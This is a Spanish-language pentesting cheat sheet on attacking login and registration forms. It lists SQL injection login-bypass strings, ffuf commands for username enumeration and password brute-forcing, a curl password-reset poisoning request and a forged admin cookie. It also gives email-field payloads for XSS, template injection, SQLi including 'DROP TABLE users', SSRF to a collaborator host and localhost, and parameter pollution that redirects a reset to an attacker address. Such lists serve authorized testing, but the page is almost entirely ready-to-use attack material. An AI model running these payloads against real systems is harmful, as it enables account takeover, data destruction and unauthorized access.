👤Login Form

admin' --
admin' #
admin' /*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--

Enumeración usuarios:

ffuf -w <wordlist-path> -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://<IP>/<loginform-path> -mr "username already exists"

Fuzz pass con lista de valid-users:

ffuf -w <valid-usernames.txt>:W1,<wordlist-pass-path>:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://<IP>/<loginform-path> -fc 200

SSRF - Reset pass:

curl 'http://<IP>/reset?email=<name>%40<URL>' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=<name>&<email=<your-email>'

Manipulación Cookies:

curl -H 'Cookie: logged_in=true; admin=true' <http://IP/cookie-test>

------------------------------------------------------------------------------------

XSS:

test+(<script>alert(hola)</script>)@email.com

test@email(<script>alert(hola)</script>).com

"<script>alert(hola)</script>"@email.com

SSTi/CSTi

"<%= 7 * 7 %>"@email.com
test+(${{7*7}})email.com

SQLi:

" ' OR 1=1 -- '"@email.com
"mail'); DROP TABLE users;--"@email.com

SSRF:

false.email@abc123.burpcollaborator.net
false.email@[127.0.0.1]

Parameter pollution:

victim&email=attacker@email.com

AnteriorIDOR Siguiente2FA Bypass

Última actualización hace 9 meses

SQLi Test en Login:

Enumeración usuarios:

Fuzz pass con lista de valid-users:

SSRF - Reset pass:

Manipulación Cookies:

Payloads en campo Email (Login/register)

XSS:

SSTi/CSTi

SQLi:

SSRF:

Parameter pollution: